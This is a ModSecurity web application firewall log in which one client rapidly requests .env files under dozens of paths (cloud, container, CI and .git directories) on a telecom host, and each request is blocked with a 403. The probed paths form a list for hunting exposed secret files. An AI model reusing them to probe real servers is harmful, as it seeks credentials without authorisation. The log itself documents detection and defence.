[Mon May 11 17:23:04.215631 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/aws/.env"] [unique_id "agH0WA-Qm4vhlWBPlMjN4AAAAAI"]
[Mon May 11 17:23:04.370262 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /azure/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/azure/.env"] [unique_id "agH0WA-Qm4vhlWBPlMjN4QAAAAI"]
[Mon May 11 17:23:04.370765 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/azure/.env"] [unique_id "agH0WA-Qm4vhlWBPlMjN4QAAAAI"]
[Mon May 11 17:23:04.371017 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/azure/.env"] [unique_id "agH0WA-Qm4vhlWBPlMjN4QAAAAI"]
[Mon May 11 17:23:04.526006 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gcp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/gcp/.env"] [unique_id "agH0WA-Qm4vhlWBPlMjN4gAAAAI"]
[Mon May 11 17:23:04.526446 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/gcp/.env"] [unique_id "agH0WA-Qm4vhlWBPlMjN4gAAAAI"]
[Mon May 11 17:23:04.526672 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/gcp/.env"] [unique_id "agH0WA-Qm4vhlWBPlMjN4gAAAAI"]
[Mon May 11 17:23:04.682481 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cloud/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/cloud/.env"] [unique_id "agH0WA-Qm4vhlWBPlMjN4wAAAAI"]
[Mon May 11 17:23:04.682961 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/cloud/.env"] [unique_id "agH0WA-Qm4vhlWBPlMjN4wAAAAI"]
[Mon May 11 17:23:04.683207 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/cloud/.env"] [unique_id "agH0WA-Qm4vhlWBPlMjN4wAAAAI"]
[Mon May 11 17:23:04.838515 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /infrastructure/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/infrastructure/.env"] [unique_id "agH0WA-Qm4vhlWBPlMjN5QAAAAI"]
[Mon May 11 17:23:04.838914 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/infrastructure/.env"] [unique_id "agH0WA-Qm4vhlWBPlMjN5QAAAAI"]
[Mon May 11 17:23:04.839125 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/infrastructure/.env"] [unique_id "agH0WA-Qm4vhlWBPlMjN5QAAAAI"]
[Mon May 11 17:23:04.995000 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/docker/.env"] [unique_id "agH0WA-Qm4vhlWBPlMjN5gAAAAI"]
[Mon May 11 17:23:04.995515 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/docker/.env"] [unique_id "agH0WA-Qm4vhlWBPlMjN5gAAAAI"]
[Mon May 11 17:23:04.995746 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/docker/.env"] [unique_id "agH0WA-Qm4vhlWBPlMjN5gAAAAI"]
[Mon May 11 17:23:05.151648 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /k8s/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/k8s/.env"] [unique_id "agH0WQ-Qm4vhlWBPlMjN6AAAAAI"]
[Mon May 11 17:23:05.152121 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/k8s/.env"] [unique_id "agH0WQ-Qm4vhlWBPlMjN6AAAAAI"]
[Mon May 11 17:23:05.152370 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/k8s/.env"] [unique_id "agH0WQ-Qm4vhlWBPlMjN6AAAAAI"]
[Mon May 11 17:23:05.307388 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kubernetes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/kubernetes/.env"] [unique_id "agH0WQ-Qm4vhlWBPlMjN6QAAAAI"]
[Mon May 11 17:23:05.307908 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/kubernetes/.env"] [unique_id "agH0WQ-Qm4vhlWBPlMjN6QAAAAI"]
[Mon May 11 17:23:05.308145 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/kubernetes/.env"] [unique_id "agH0WQ-Qm4vhlWBPlMjN6QAAAAI"]
[Mon May 11 17:23:05.462271 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /terraform/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/terraform/.env"] [unique_id "agH0WQ-Qm4vhlWBPlMjN6gAAAAI"]
[Mon May 11 17:23:05.462762 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/terraform/.env"] [unique_id "agH0WQ-Qm4vhlWBPlMjN6gAAAAI"]
[Mon May 11 17:23:05.462990 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/terraform/.env"] [unique_id "agH0WQ-Qm4vhlWBPlMjN6gAAAAI"]
[Mon May 11 17:23:05.616958 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ansible/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/ansible/.env"] [unique_id "agH0WQ-Qm4vhlWBPlMjN6wAAAAI"]
[Mon May 11 17:23:05.617473 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/ansible/.env"] [unique_id "agH0WQ-Qm4vhlWBPlMjN6wAAAAI"]
[Mon May 11 17:23:05.617699 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/ansible/.env"] [unique_id "agH0WQ-Qm4vhlWBPlMjN6wAAAAI"]
[Mon May 11 17:23:05.771756 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/.env"] [unique_id "agH0WQ-Qm4vhlWBPlMjN7AAAAAI"]
[Mon May 11 17:23:05.772261 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/.env"] [unique_id "agH0WQ-Qm4vhlWBPlMjN7AAAAAI"]
[Mon May 11 17:23:05.772475 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/.env"] [unique_id "agH0WQ-Qm4vhlWBPlMjN7AAAAAI"]
[Mon May 11 17:23:05.927897 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ci/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/ci/.env"] [unique_id "agH0WQ-Qm4vhlWBPlMjN7QAAAAI"]
[Mon May 11 17:23:05.928407 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/ci/.env"] [unique_id "agH0WQ-Qm4vhlWBPlMjN7QAAAAI"]
[Mon May 11 17:23:05.928640 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/ci/.env"] [unique_id "agH0WQ-Qm4vhlWBPlMjN7QAAAAI"]
[Mon May 11 17:23:06.086827 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cd/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/cd/.env"] [unique_id "agH0Wg-Qm4vhlWBPlMjN7gAAAAI"]
[Mon May 11 17:23:06.087285 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/cd/.env"] [unique_id "agH0Wg-Qm4vhlWBPlMjN7gAAAAI"]
[Mon May 11 17:23:06.087484 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/cd/.env"] [unique_id "agH0Wg-Qm4vhlWBPlMjN7gAAAAI"]
[Mon May 11 17:23:06.241758 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /jenkins/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/jenkins/.env"] [unique_id "agH0Wg-Qm4vhlWBPlMjN7wAAAAI"]
[Mon May 11 17:23:06.242257 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/jenkins/.env"] [unique_id "agH0Wg-Qm4vhlWBPlMjN7wAAAAI"]
